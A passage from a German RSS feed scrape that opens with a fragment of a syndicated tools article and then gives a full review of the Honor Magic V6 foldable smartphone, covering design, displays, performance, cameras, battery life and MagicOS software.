<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Es gibt neuere Versionen des Nethack-Konzepts - manchmal fährt man jedoch mit dem Original am besten." title="Es gibt neuere Versionen des Nethack-Konzepts - manchmal fährt man jedoch mit dem Original am besten." src="https://images.computerwoche.de/bdb/3392877/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Es gibt neuere Versionen des Nethack-Konzepts – manchmal fährt man jedoch mit dem Original am besten.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph"><strong>Dieser Artikel ist <a href="https://www.infoworld.com/article/2337138/9-command-line-jewels-for-your-developer-toolkit.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Infoworld.com erschienen.<br></strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Honor Magic V6 im Test: Das fast perfekte Foldable]]></title>
<description><![CDATA[Luke Baker



Auf einen Blick



Pro




Wunderschönes, schlankes Design



Große, helle Displays



Hervorragende Kameras



Coole Software-Funktionen




Kontra




Hoher Preis



MagicOS kann gelegentlich frustrierend sein




Fazit



Das Honor Magic V6 ist ein Falt-Smartphone, das einfach al...]]></description>
<link>https://tsecurity.de/de/3694426/it-security-nachrichten/honor-magic-v6-im-test-das-fast-perfekte-foldable/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694426/it-security-nachrichten/honor-magic-v6-im-test-das-fast-perfekte-foldable/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-21.52.53.png?w=1024" alt="Honor Magic V6" class="wp-image-4198590" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<h2 class="wp-block-heading">Auf einen Blick</h2>



<h3 class="wp-block-heading">Pro</h3>



<ul class="wp-block-list">
<li>Wunderschönes, schlankes Design</li>



<li>Große, helle Displays</li>



<li>Hervorragende Kameras</li>



<li>Coole Software-Funktionen</li>
</ul>



<h3 class="wp-block-heading">Kontra</h3>



<ul class="wp-block-list">
<li>Hoher Preis</li>



<li>MagicOS kann gelegentlich frustrierend sein</li>
</ul>



<h3 class="wp-block-heading">Fazit</h3>



<p class="wp-block-paragraph">Das Honor Magic V6 ist ein Falt-Smartphone, das einfach alles kann. Es ist schlank, robust, leistungsstark und sieht gut aus. Die Kameras gehören zu den besten, die Software bietet einige raffinierte Funktionen und die Akkulaufzeit ist außergewöhnlich. Besitzer eines Magic V5 werden wahrscheinlich kaum einen Grund für ein Upgrade sehen, aber für alle anderen ist es eine gute Wahl – sofern Sie es sich leisten können.</p>



<p class="wp-block-paragraph">Das Honor Magic V6 wurde ursprünglich bereits im März in China vorgestellt, doch es dauerte eine Weile, bis es den Weg nach Europa fand. Nun ist es endlich in Europa erhältlich und strebt den Titel des bislang <a href="https://www.pcwelt.de/article/2109390/bestes-falt-smartphone.html" target="_blank">besten Falt-Smartphones</a> an.</p>



<p class="wp-block-paragraph">Leider ist die Konkurrenz für Honor stärker denn je, und sie wird noch härter werden, sobald Apples seit Langem gemunkeltes Foldable auf den Markt kommt. Bietet dieses schlanke Kraftpaket genug, um weiterhin überzeugend zu bleiben?</p>



<p class="wp-block-paragraph">Es sieht auf jeden Fall vielversprechend aus, verfügt über einen der größten Akkus aller jemals erschienenen Falt-Smartphones, ist das erste mit IP69-Zertifizierung und gehört dennoch zu den dünnsten Modellen. Das ist schon mal ein guter Anfang. Ich habe es in den vergangenen Wochen auf Herz und Nieren geprüft, und hier ist mein Fazit.</p>



<h2 class="wp-block-heading">Design &amp; Verarbeitung</h2>



<ul class="wp-block-list">
<li>Aluminiumrahmen, Rückseite aus Verbundfasermaterial</li>



<li>219 g, NanoCrystal Shield-Glas</li>



<li>IP69-zertifiziert</li>
</ul>



<p class="wp-block-paragraph">Das Honor Magic V6 sieht dem <a href="https://www.pcwelt.de/article/2838914/honor-magic-v5-test.html" target="_blank">Magic V5</a> sehr ähnlich, wobei der auffälligste Unterschied in der Form des Kamerarahmens liegt. Dieser ist nun kantiger und weist eine achteckige Form auf. Auch neue Farbvarianten tragen dazu bei, es von der Vorgängergeneration abzugrenzen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.14.26.png?w=1024" alt="Honor Magic V6" class="wp-image-4199606" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Die rote Version ist wahrscheinlich die auffälligste; sie verfügt über eine tiefrote, fast blutrote Rückseite mit strukturierter Oberfläche. Ich besitze die goldene Version, die ebenfalls sehr auffällig ist. Freunde haben bemerkt, dass es wie ein Smartphone aussieht, das ein saudischer Prinz oder Kim Kardashian benutzen würde.</p>



<p class="wp-block-paragraph">Die Farbe schimmert leicht, wenn Licht darauf fällt; sowohl am Scharnier als auch auf der Rückseite ist ein dezentes, sich wiederholendes Dreiecksmuster zu erkennen, und es bleibt irgendwie frei von Fingerabdrücken, obwohl es ziemlich glänzend ist. Das sieht wirklich cool aus. Auch die mitgelieferte Hülle ist von höchster Qualität, mit einem cremefarbenen Kunstlederbezug und einem roségoldenen Kamerarahmen, der gleichzeitig als ausklappbarer Ständer dient.</p>



<p class="wp-block-paragraph">Wenn Sie etwas suchen, das etwas weniger Aufmerksamkeit auf sich zieht, gibt es natürlich auch traditionellere Modelle in Schwarz und Weiß. Letzteres hat zudem einen versteckten Vorteil: Mit nur 8,75 Millimetern im geschlossenen Zustand ist es das dünnste Modell der Reihe, und Honor geht davon aus, dass es derzeit das dünnste Falt-Smartphone auf dem Markt ist.</p>



<p class="wp-block-paragraph">Ich habe das weiße Modell nicht ausprobiert, und vielleicht ist es tatsächlich spürbar schlanker, aber meiner Meinung nach sieht die goldene Version definitiv etwas dicker aus und fühlt sich auch so wie mein 8,9 Millimeter dickes <a href="https://www.pcwelt.de/article/2843601/samsung-galaxy-z-fold-7-test.html" target="_blank">Galaxy Z Fold 7</a> an.</p>



<p class="wp-block-paragraph">Das ist allerdings Haarspalterei, denn dieses Smartphone ist immer noch dünner als viele Flaggschiff-Smartphones im Barrenformat. Ob es nun das dünnste ist oder nicht – es ist auf jeden Fall dünn genug, um sich in der Hosentasche angenehm anzufühlen.<br><br></p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.14.34.png?w=1024" alt="Honor Magic V6" class="wp-image-4199607" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Erwähnenswert ist auch, dass das Cover-Display nun flach ist und eine symmetrischere Form aufweist. Dadurch sieht das Smartphone im zusammengeklappten Zustand noch mehr wie ein herkömmliches Barren-Handy aus, doch die unvermeidliche, eckige Kante am Scharnier verrät es ein wenig.<br><br></p>



<p class="wp-block-paragraph">So wichtig die Abmessungen eines Klapphandys auch sind, ebenso entscheidend ist die Robustheit. Und glücklicherweise ist das Honor Magic V6 robust wie ein Panzer gebaut.</p>



<p class="wp-block-paragraph">Es verfügt über die Schutzklasse IP69 – die höchste aller faltbaren Smartphones. Das bedeutet, dass es praktisch staubdicht ist und sowohl das Eintauchen in Süßwasser als auch den Strahl von heißem Wasser problemlos aushält. Die Technologie der faltbaren Smartphones hat große Fortschritte gemacht.</p>



<p class="wp-block-paragraph">Es ist zudem besonders robust konstruiert, mit kratzfestem „NanoCrystal Shield“-Glas auf der Vorderseite und einem „Super Steel“-Scharnier, das die Stoßfestigkeit verbessert.</p>



<p class="wp-block-paragraph">SGS-Zertifizierungen untermauern diese Angaben ebenfalls, da das Smartphone für seine Fallfestigkeit mit 5 Sternen ausgezeichnet wurde. Ich habe mein Testgerät nicht allzu grob behandelt, aber es ist beruhigend zu wissen, dass es unversehrt bleiben dürfte, sollte mir einmal ein Ausrutscher unterlaufen.</p>



<h2 class="wp-block-heading">Bildschirm &amp; Lautsprecher</h2>



<ul class="wp-block-list">
<li>Außen: 6,52 Zoll, 1.080 x 2.420, OLED, 120 Hertz</li>



<li>Innen: 7,95 Zoll, 2.172 × 2.352, OLED, 120 Hertz</li>



<li>Stereolautsprecher</li>
</ul>



<p class="wp-block-paragraph">Bei Falt-Smartphones dreht sich alles um den Bildschirm. Beginnen wir also mit dem Star der Show: dem inneren Display. Mit einer Diagonale von knapp unter 8 Zoll gehört es zu den größten Falt-Smartphones im Buchformat auf dem Markt.</p>



<p class="wp-block-paragraph">Es ist nahezu perfekt quadratisch, was sich hervorragend für die parallele Nutzung zweier Apps eignet.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.14.39.png?w=1024" alt="Honor Magic V6" class="wp-image-4199608" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Dieses flexible Display verfügt über eine Bildwiederholfrequenz von 120 Hertz und erreicht eine beeindruckende Spitzenhelligkeit von 5.000 Nits. Solche Helligkeitsangaben sollten Sie zwar stets mit einer gehörigen Portion Skepsis betrachten, doch unabhängig davon handelt es sich um ein sehr helles Display, das auch im Freien gut ablesbar ist.</p>



<p class="wp-block-paragraph">Der innere Bildschirm ist mit einer glänzenden Schutzfolie versehen (wenn auch mit einer Antireflexbeschichtung), was sowohl Vor- als auch Nachteile mit sich bringt. Wie ich bereits in anderen Testberichten zu Falt-Smartphones erwähnt habe, kaschieren mattierte Schutzfolien die Falz zwar besser, ziehen aber auch Fingerabdrücke an. Diese hier verschmiert nicht so leicht, doch trotz aller Bemühungen von Honor treten entlang der Falz einige unerwünschte Reflexionen auf.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.14.44.png?w=1024" alt="Honor Magic V6" class="wp-image-4199609" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Apropos: Die Falz ist bewundernswert flach, und noch vor nicht allzu langer Zeit wäre sie die beste gewesen, die mir je begegnet wäre. Allerdings nutze ich das Oppo Find N6 seit seiner Markteinführung fast täglich, und leider kann dieses Modell da nicht ganz mithalten.</p>



<p class="wp-block-paragraph">Es ist dennoch äußerst beeindruckend und um Längen besser als das <a href="https://www.pcwelt.de/article/2945312/google-pixel-10-pro-test-3.html" target="_blank">Pixel 10 Pro Fold</a>. Auch im Vergleich zum Galaxy Z Fold 7 fällt die Falz etwas weniger auf.</p>



<p class="wp-block-paragraph">Was das Außendisplay betrifft, so ist es fast nicht von dem Bildschirm eines Flaggschiff-Handys im Barren-Format zu unterscheiden, abgesehen davon, dass es ganz leicht schmaler ist als üblich. Es verfügt über schöne, schmale Einfassungen an allen Seiten, eine flinke Bildwiederholfrequenz von 120 Hertz und eine noch höhere Spitzenhelligkeit von 6.000 Nits.</p>



<p class="wp-block-paragraph">Wie bereits bei den letzten Generationen der faltbaren Honor-Modelle gibt es keine nennenswerten Nachteile bei der Nutzung des zusammengeklappten Telefons; es fühlt sich einfach wie ein normales Smartphone an. Wenn Sie dann einen größeren Bildschirm für Ihre Inhalte, Spiele oder Multitasking benötigen, klappen Sie es einfach auf.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.14.47.png?w=1024" alt="Honor Magic V6" class="wp-image-4199611" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Wie üblich hat Honor einiges in Funktionen zum Augenschutz investiert, und beide Bildschirme unterstützen eine PWM-Dimmung mit 4.320 Hertz. Das werden Sie besonders zu schätzen wissen, wenn Sie empfindlich auf Flackern reagieren. Beide Bildschirme unterstützen zudem die Eingabe per Stylus, allerdings hatte ich leider keinen Honor-Stylus zur Hand, um dies auszuprobieren.</p>



<p class="wp-block-paragraph">Die luxuriösen Displays werden durch ein ordentliches Lautsprecherset ergänzt. Das Stereopaar erzeugt eine schöne, breite Klangbühne, kann mehr als laut genug werden und bietet eine ordentliche Basswiedergabe. Sie können zwar nicht mit den bassbetonten Lautsprechern des <a href="https://www.pcwelt.de/article/3041397/honor-magic-8-pro-test.html" target="_blank">Magic 8 Pro</a> mithalten, aber bei einem so schlanken Gehäuse sind die Möglichkeiten nun einmal begrenzt.</p>



<h2 class="wp-block-heading">Technische Daten &amp; Leistung</h2>



<ul class="wp-block-list">
<li>Qualcomm Snapdragon 8 Elite Gen 5</li>



<li>16 GB RAM</li>



<li>512 GB Speicher</li>
</ul>



<p class="wp-block-paragraph">Das Magic V6 verfügt über den leistungsstärksten Chip von Qualcomm, den Snapdragon 8 Elite Gen 5, und das globale Modell ist mit 16 GB RAM und 512 GB Speicher ausgestattet. Bei einem so schlanken Falt-Smartphone stellt die Wärmeableitung stets eine Herausforderung dar, doch Honor hat hier eine großzügig dimensionierte Vapor-Chamber verbaut, um eine optimale Leistung zu gewährleisten.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.14.51.png?w=1024" alt="Honor Magic V6" class="wp-image-4199612" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Das V6 hat meine täglichen Leistungsanforderungen problemlos erfüllt. Bei einem Falt-Smartphone habe ich oft drei Apps gleichzeitig geöffnet, wechsle zwischen ihnen hin und her und spiele häufig gleichzeitig Musik ab oder streame Videos. Selbst dann kam das Smartphone kaum ins Schwitzen.</p>



<p class="wp-block-paragraph">Man muss schon ein ziemlich anspruchsvolles Spiel starten, um dieses Smartphone ein wenig ins Schwitzen zu bringen, und wie es der Zufall so will, bin ich ziemlich süchtig nach <em>NTE: Neverness to Everness</em> (ein Open-World-Spiel mit atemberaubender Grafik und einer riesigen Stadtkarte, mit deren Darstellung die meisten Smartphones zu kämpfen haben). Doch das Magic V6 hatte damit kaum Probleme.</p>



<p class="wp-block-paragraph">Das Spiel lief bei der Grafikvoreinstellung „Extreme“ flüssig mit 60 FPS, und obwohl es sich ziemlich stark erwärmte – insbesondere im Bereich der Kamera –, schien die Leistung darunter nicht zu leiden. Die beste Erfahrung machte ich mit einem GameSir-Clamp-Controller, der die Wärme von meinen Handflächen fernhielt.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.14.55.png?w=1024" alt="Honor Magic V6" class="wp-image-4199613" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<h2 class="wp-block-heading">Honor Magic V6 – Benchmark-Ergebnisse</h2>



<p class="wp-block-paragraph">Was die Benchmark-Ergebnisse angeht, wird es recht interessant. Während die meisten Ergebnisse hervorragend waren, hatte das Smartphone erhebliche Schwierigkeiten, den 3DMark Wildlife Extreme Stress Test abzuschließen. Normalerweise führe ich diesen Test bei aufgeklapptem Smartphone durch, doch es überhitzte sich und brach den Benchmark jedes Mal ab, wenn ich es versuchte.</p>



<p class="wp-block-paragraph">Zugegebenermaßen war es in letzter Zeit recht warm, doch so etwas ist mir bisher noch nie passiert. Bei der Durchführung des Tests auf dem Cover-Display konnte es den Test mit einem ordentlichen Ergebnis abschließen, auf dem klappbaren Bildschirm war dies jedoch nicht möglich. Im alltäglichen Gebrauch hatte ich jedoch nie derartige Probleme.</p>



<div class="infogram-embed" data-id="c07985c1-d0b5-46f6-bd84-2898abc5f4fa" data-type="interactive" data-title="Honor Magic V6 benchmarks"></div>




<h2 class="wp-block-heading">Kameras</h2>



<ul class="wp-block-list">
<li>50-MP-Hauptkamera mit f/1,6</li>



<li>64 MP, f/2,5, 3-fach-Tele</li>



<li>50 MP, f/2,2 Ultraweitwinkel</li>



<li>20 MP, f/2,2 Selfie-Kamera</li>
</ul>



<p class="wp-block-paragraph">Das Honor Magic V6 verfügt über dieselbe Kamera-Hardware wie die Vorgängergeneration, was bedeutet, dass es keine nennenswerten Neuerungen gibt.</p>



<p class="wp-block-paragraph">Allerdings verfügte das V5 bereits über eine der beeindruckendsten Kameraausstattungen unter allen faltbaren Smartphones, und die Konkurrenz hat sich in dieser Hinsicht nicht sonderlich ins Zeug gelegt – daher gehört es nach wie vor zu den Besten.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.14.59.png?w=1024" alt="Honor Magic V6" class="wp-image-4199614" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Auf der Rückseite befindet sich eine 50-MP-Hauptkamera mit einem Sensor von ansehnlicher Größe (1/1,56 Zoll) und einem lichtstarken f/1,6-Objektiv. Hinzu kommen eine 50-MP-Ultraweitwinkelkamera mit einem extrem weiten Sichtfeld (entspricht 13 mm) sowie ein ausgezeichnetes 64-MP-Teleobjektiv. Außerdem gibt es zwei 20-MP-Selfie-Kameras, von denen jeweils eine durch das jeweilige Display ragt.</p>



<p class="wp-block-paragraph">Dies ist eine äußerst vielseitige Objektivausstattung, mit der Sie alles aufnehmen können – von weitläufigen Landschaften bis zu intimen Porträts. Wie üblich hat mir die Verwendung des Teleobjektivs am meisten Spaß gemacht, und dies könnte die beste Tele-Kamera sein, die jemals in einem faltbaren Smartphone verbaut wurde.</p>



<p class="wp-block-paragraph">Es verfügt über einen recht großen 1/2-Zoll-Sensor und kann aus sehr kurzer Entfernung fokussieren. Ihr Motiv muss sich lediglich etwa 20 Zentimeter vom Objektiv entfernt befinden, und in Kombination mit der Brennweite von 70 mm (äquivalent) entsteht so eine schöne perspektivische Kompression und ein natürliches Bokeh.</p>



<p class="wp-block-paragraph">Natürlich können Sie mit einem digitalen Ausschnitt noch weiter zoomen, und die Kamera-App ermöglicht Ihnen auf Wunsch eine bis zu 100-fache Vergrößerung. Bei einer Vergrößerung von mehr als 10-fach können Sie generative KI nutzen, um die Bilder zu bereinigen, doch auch ohne diese Funktion erhalten Sie bereits bei etwa 20-facher Vergrößerung brauchbare Bilder.</p>



<p class="wp-block-paragraph">Ich habe bereits erwähnt, wie weitwinklig das Ultraweitwinkelobjektiv ist, und das gefällt mir besonders gut daran; ansonsten ist es jedoch im Vergleich zu den anderen Objektiven definitiv ein Qualitätsverlust.</p>



<p class="wp-block-paragraph">Nachts ist es zudem am wenigsten überzeugend, da Bewegungsunschärfe dort nur schwer zu bewältigen ist. Bei den richtigen Lichtverhältnissen ist es jedoch zu wirklich beeindruckenden Aufnahmen fähig.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.15.23.png?w=1024" alt="Honor Magic V6" class="wp-image-4199618" width="1024" height="918" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Die Hauptkamera ist wie immer die zuverlässigste des Trios. Dank des größeren Sensors schneidet sie bei schlechten Lichtverhältnissen am besten ab und liefert tagsüber etwas schärfere Bilder als die anderen Kameras.</p>



<p class="wp-block-paragraph">Die Selfie-Kameras sind nichts Besonderes. Sie erfüllen ihren Zweck und eignen sich für Zoom-Anrufe, doch wenn man auf der Rückseite so beeindruckende Kameras hat, lohnt es sich wirklich, das Smartphone umzudrehen und den Bildschirm auf der Rückseite zu nutzen, um wirklich beeindruckende Fotos zu machen.</p>



<p class="wp-block-paragraph">Die Bildverarbeitung von Honor kann etwas unbeständig sein, aber ich habe den Eindruck, dass sie immer konsistenter wird, und wenn sie funktioniert, lassen sich wirklich atemberaubende Bilder erzielen.</p>



<p class="wp-block-paragraph">Mein größter Kritikpunkt ist die Bewegungsunschärfe im Porträtmodus. Ich bin mir nicht sicher, woran es liegt, aber ich erhalte viele unscharfe Aufnahmen, wenn die künstliche Hintergrundunschärfe aktiviert ist – selbst bei guten Lichtverhältnissen.</p>



<p class="wp-block-paragraph">Ansonsten bin ich mit den Bildern, die ich mit dem Magic V6 aufgenommen habe, sehr zufrieden. Die Harcourt-Porträtmodi sind so beeindruckend wie eh und je, und mit den übrigen Filtern lässt sich der Look Ihrer Fotos ziemlich drastisch verändern. Besonders gut gefällt mir der Filter „Nostalgic Negative“, der einen schönen, kontrastreichen Cross-Entwicklungs-Look mit blauen Schatten erzeugt.</p>



<p class="wp-block-paragraph">Was die Videoaufnahmen angeht, ist das Angebot etwas weniger umfangreich. Das soll nicht heißen, dass es schlecht ist, aber nachdem ich viel Zeit mit dem Oppo Find N6 verbracht habe, habe ich mich an ein ordentliches Log-Profil, 4K-120-Aufnahmen und Dolby Vision gewöhnt. Nichts davon ist hier vorhanden. Es gibt zwar ein Log-Profil, dieses funktioniert jedoch nur mit dem Hauptsensor und erzeugt ungewöhnlich körnige Schatten.</p>



<p class="wp-block-paragraph">Wenn Sie jedoch keine ganz so professionellen Ansprüche haben, werden Sie mit der Videoleistung wahrscheinlich sehr zufrieden sein. Sie können mit jeder Kamera bis zu 4K bei 60 FPS aufnehmen, mit Ausnahme der Selfie-Kamera, die maximal 4K bei 30 FPS erreicht. Die Bildstabilisierung ist gut, und auch die Mikrofone sind ordentlich.</p>



<h2 class="wp-block-heading">Akkulaufzeit &amp; Aufladen</h2>



<ul class="wp-block-list">
<li>6.660-mAh-Akku</li>



<li>80-Watt-Laden über Kabel</li>



<li>66 Watt kabelloses Laden</li>
</ul>



<p class="wp-block-paragraph">Das Honor Magic V6 verfügt über den größten Akku aller faltbaren Smartphones, die ich bisher getestet habe. Irgendwie ist es Honor gelungen, einen 6660-mAh-Akku in dieses hauchdünne Gehäuse zu integrieren. Samsun wird hoffentlich davon lernen.</p>



<p class="wp-block-paragraph">Diese Kapazität verblasst zwar im Vergleich zur chinesischen 1-TB-Version dieses Smartphones, die über einen erstaunlichen 7.150-mAh-Akku verfügt, doch wie wir in letzter Zeit oft gesehen haben, bedeuten die EU-Vorschriften, dass wir im Westen keinen ganz so massiven Akku erhalten können.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.15.38.png?w=1024" alt="Honor Magic V6" class="wp-image-4199619" width="1024" height="574" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Das spielt jedoch keine allzu große Rolle, denn dieser Akku ist mehr als gut genug. Obwohl ich den großen internen Bildschirm häufig nutzte und unzählige Fotos machte, reichte die Akkulaufzeit dieses Smartphones während des Großteils meiner Tests für eineinhalb Tage. Natürlich verkürzt intensives Gaming die Laufzeit etwas, aber Sie werden das Gerät selten, wenn überhaupt, vor dem Schlafengehen aufladen müssen.</p>



<p class="wp-block-paragraph">Auch das Aufladen erfolgt schnell, vorausgesetzt, Sie verfügen über ein ausreichend leistungsstarkes Netzteil (im Lieferumfang ist lediglich ein USB-C-Kabel enthalten), um die 80-Watt-Geschwindigkeit nutzen zu können. Ich konnte das Gerät in nur einer halben Stunde von leer auf fast 70 Prozent aufladen; mehr kann man sich kaum wünschen.</p>



<p class="wp-block-paragraph">Wenn Sie kabelloses Laden bevorzugen, ist dies ohne nennenswerte Einbußen bei der Geschwindigkeit möglich. Das Honor Magic V6 lässt sich mit einem offiziellen kabellosen Ladepad von Honor mit bis zu 66 Watt aufladen.</p>



<h2 class="wp-block-heading">Software &amp; Apps</h2>



<ul class="wp-block-list">
<li>MagicOS 10, basierend auf Android 16</li>



<li>Zahlreiche KI-Funktionen</li>



<li>Kompatibilität mit dem Apple-Ökosystem</li>
</ul>



<p class="wp-block-paragraph">Auf dem Magic V6 läuft MagicOS 10, Honors eigene Variante von <a href="https://www.pcwelt.de/article/2781437/android-16-release-design-funktionen-kompatible-geraete.html" target="_blank">Android 16</a>. Es handelt sich im Wesentlichen um dieselbe Software, die wir bereits von den letzten Honor-Flaggschiffmodellen kennen. Wenn Sie also bereits eines dieser Modelle ausprobiert haben, werden Sie kaum Überraschungen erleben.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.15.46.png?w=1024" alt="Honor Magic V6" class="wp-image-4199620" width="1024" height="574" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Die Software von Honor kann die Meinungen spalten. Sie weicht ziemlich stark vom typischen Android-Erlebnis ab; stattdessen erinnert sie zunehmend an iOS. Ob das nun gut ist oder nicht, hängt ganz von Ihren Vorlieben ab.</p>



<p class="wp-block-paragraph">Allerdings lässt sich die Benutzeroberfläche extrem gut anpassen – wenn Ihnen also das Design oder das Layout einer Funktion nicht gefällt, können Sie es höchstwahrscheinlich ändern.</p>



<p class="wp-block-paragraph">Insgesamt gefällt sie mir recht gut. Sie wirkt schnell und reaktionsfreudig, sieht standardmäßig ansprechend aus und bietet zahlreiche Werkzeuge zur weiteren Anpassung. Wie bereits erwähnt, gibt es zahlreiche Anlehnungen an iOS, darunter einige „Liquid Glass“-ähnliche Elemente, einen „Dynamic Island“-Klon, geteilte Benachrichtigungen/Schnelleinstellungen sowie die Möglichkeit, die App-Übersicht zu deaktivieren.</p>



<p class="wp-block-paragraph">Das sind zwar nicht die originellsten Entscheidungen, aber sie funktionieren gut, und die meisten sind vollkommen optional.</p>



<p class="wp-block-paragraph">Honor bietet Ihnen eine Vielzahl von KI-Funktionen, darunter die üblichen Tools für Transkription, Übersetzung und Zusammenfassung sowie einige sehr fortschrittliche Funktionen zur Fotobearbeitung.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.15.53.png?w=1024" alt="Honor Magic V6" class="wp-image-4199623" width="1024" height="574" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Auch das Multitasking ist hervorragend. Sie können Apps im Split-View nebeneinander anzeigen und dann eine dritte hinzufügen, die nur am Rand des Bildschirms hervorblitzt und bei Bedarf sofort einsatzbereit ist. Oder, wenn Sie es vorziehen, können Sie schwebende Fenster nutzen und so noch mehr Inhalte gleichzeitig auf dem Bildschirm anzeigen.</p>



<p class="wp-block-paragraph">Am spannendsten finde ich jedoch die Art und Weise, wie sich das Magic V6 in Apple-Produkte integrieren lässt. Insbesondere, wie gut es mit meinem Macbook zusammenarbeitet. Wenn Sie die Honor Workstation-App aus dem Mac App Store installieren, können Sie Dateien austauschen, zwischen Geräten kopieren und einfügen, Ihr Smartphone fernsteuern und das V6 sogar als drahtlosen zweiten Bildschirm nutzen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.15.58.png?w=1024" alt="Honor Magic V6" class="wp-image-4199625" width="1024" height="574" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Doch damit ist der Spaß noch lange nicht vorbei. Das Honor Magic V6 kann auch nativ Dateien in Ihrem iCloud-Konto durchsuchen und verwalten, und mit Honor Connect können Sie Dateien auch per AirDrop zu und von iPhones übertragen. Das ist großartig, wenn Sie ständig zwischen verschiedenen Ökosystemen hin- und herwechseln (wie ich es oft tue).</p>



<p class="wp-block-paragraph">Insgesamt ist es also ein solides Software-Erlebnis, das jedoch nicht ganz ohne Nachteile ist. Meine größte Kritik an Honor-Smartphones ist seit einigen Jahren unberücksichtigt geblieben. Das Akkumanagement ist extrem aggressiv und beendet standardmäßig Hintergrund-Apps mit rücksichtsloser Härte.</p>



<p class="wp-block-paragraph">Das bedeutet, dass Sie häufig unter stark verzögerten Benachrichtigungen leiden, bis Sie einige Einstellungen anpassen und sicherstellen, dass diese Apps geöffnet bleiben.</p>


